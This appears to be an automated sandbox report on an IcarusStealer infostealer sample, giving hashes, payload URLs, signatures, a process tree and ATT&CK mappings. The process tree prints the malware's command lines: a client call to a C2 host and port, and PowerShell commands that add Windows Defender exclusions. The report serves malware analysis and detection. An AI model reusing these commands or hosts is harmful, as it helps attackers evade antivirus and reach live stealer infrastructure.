Overview

overview

10

Static

static

3

pantheon s...ed.exe

windows7-x64

10

pantheon s...ed.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    05-03-2024 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pantheon sucurity-cleaned-cleaned.exe

  • Size

    493KB

  • MD5

    1c55aba76c3683fbbf929c8567b6e04d

  • SHA1

    0c93b0e1270bd409388c411b12f4ccd740c38075

  • SHA256

    ab5459d5eb0d95fcc9ddfe4a577a609be53b06b509e5a65927862f67f7da8f93

  • SHA512

    75cce368e043f1b87363f9f24f558d1d212c0cbfcb108d3a937763d5711ced589f472fea019a5ac00637886166715f2a4356e8b3938114eb5fefe117fcf3f3b1

  • SSDEEP

    12288:3Bk5ut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qb:Oa6N6LqQzJqko

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\pantheon sucurity-cleaned-cleaned.exe
    "C:\Users\Admin\AppData\Local\Temp\pantheon sucurity-cleaned-cleaned.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2248
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pcj0hclf\pcj0hclf.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1584
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES148A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE496F2C0DAB140AABE3859A7723927D8.TMP"
        3⤵
          PID:2584
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          3⤵
            PID:2496
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
          2⤵
            PID:2700
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1852
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3020
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3064
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\YourPhone.exe & exit
            2⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
              C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2516

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        2
        T1112

        Subvert Trust Controls

        1
        T1553

        Install Root Certificate

        1
        T1553.004

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Web Service

        1
        T1102

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\RES148A.tmp
          Filesize

          1KB

          MD5

          77e2d7ca2220805d0636e9ad2ef76fe7

          SHA1

          64dab9b44c076d342d84beb65e66dc240f05fb12

          SHA256

          fb50614cb1ff96b5da1b823ffe9d822e48930fef61be44d42aa0a7f61d17e49e

          SHA512

          e7571864d5df3a1458d75518cf810c1ac287a4a9c22a957a0a5d306872657f620d2c122ff2d47be18e656ca36799dd2b81780b7727a1d821a0ce0aa8c6f5b043

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AF9AVV6HRQOCA3CDBGS7.temp
          Filesize

          7KB

          MD5

          0a0872627207202b575c7545bdbd5038

          SHA1

          90ac1eb353f162a3a732c9262df01f832b5dc72b

          SHA256

          52bd772cdc89ec6930f257f166bb03ededbf5ada7ded881cd79115b2504f49dd

          SHA512

          6a772b55d8426e2007c79e5fe3a67dbe85294fd54ec734bec7c9c2e823d99203c6404859398716aeb5be52381d21ce4b654ec97effe8b49af186f7639a7eaf26

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\CSCE496F2C0DAB140AABE3859A7723927D8.TMP
          Filesize

          1KB

          MD5

          1d5543c367c49b9dd6366270fdd4ee3a

          SHA1

          bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66

          SHA256

          502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2

          SHA512

          86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\pcj0hclf\pcj0hclf.0.cs
          Filesize

          1KB

          MD5

          14846c9faaef9299a1bf17730f20e4e6

          SHA1

          8083da995cfaa0e8e469780e32fcff1747850eb6

          SHA256

          61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

          SHA512

          549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\pcj0hclf\pcj0hclf.cmdline
          Filesize

          451B

          MD5

          0cf9a200828e0178df067f5e67339ce0

          SHA1

          8d3380c0bb3123335ef22979fa19b5850ad74f69

          SHA256

          a9611639d8c42d9c220f167541db8d3a2861211f639759efe121b827cf5220f6

          SHA512

          ce3eab01ec294ab1375b4b643be803f3c5f367b000b3efdfbb5dc50a26716290c2b7032405f0c69818f0c432dbacc4aebbb88ed338643d88293c2c151870ee44

          Download Submit
        • \Users\Admin\AppData\Local\Temp\YourPhone.exe
          Filesize

          4KB

          MD5

          c0deef2fbdf26c1a48dc7abc1c4cc831

          SHA1

          2b9364c95e9428c4a86e566cc476b3566c5bc2aa

          SHA256

          92d49c5df8f5befb9c5fb74df580c3c9ed22d38bd6a0e4e3af8319011f05ccf0

          SHA512

          387f1e7363a6826d8373b84030c0bfbdd0593b5fde09a3ae09c74732d0a633f1fe574ffc68d27bd360d0764c545beb6efeb2fb07f898e131b3aff172ab5db913

          Download Submit
        • memory/1852-42-0x000000006ED40000-0x000000006F2EB000-memory.dmp
          Filesize

          5.7MB

          Download
        • memory/2248-40-0x00000000744F0000-0x0000000074BDE000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2248-1-0x00000000744F0000-0x0000000074BDE000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2248-2-0x00000000004C0000-0x0000000000500000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2248-0-0x0000000000F30000-0x0000000000FB2000-memory.dmp
          Filesize

          520KB

          Download
        • memory/2516-46-0x000000001B010000-0x000000001B090000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2516-45-0x000007FEF58C0000-0x000007FEF62AC000-memory.dmp
          Filesize

          9.9MB

          Download
        • memory/2516-50-0x000007FEF58C0000-0x000007FEF62AC000-memory.dmp
          Filesize

          9.9MB

          Download
        • memory/2516-51-0x000000001B010000-0x000000001B090000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2516-32-0x0000000000230000-0x0000000000238000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2596-48-0x0000000004210000-0x0000000004211000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2596-53-0x0000000004210000-0x0000000004211000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2596-57-0x0000000002B90000-0x0000000002BA0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2704-31-0x00000000744F0000-0x0000000074BDE000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2704-26-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-24-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-22-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-47-0x0000000000FE0000-0x0000000001020000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2704-17-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-49-0x00000000744F0000-0x0000000074BDE000-memory.dmp
          Filesize

          6.9MB

          Download
        • memory/2704-19-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-21-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2704-52-0x0000000000FE0000-0x0000000001020000-memory.dmp
          Filesize

          256KB

          Download
        • memory/2704-20-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2704-15-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB

          Download
        • memory/3064-41-0x000000006ED40000-0x000000006F2EB000-memory.dmp
          Filesize

          5.7MB

          Download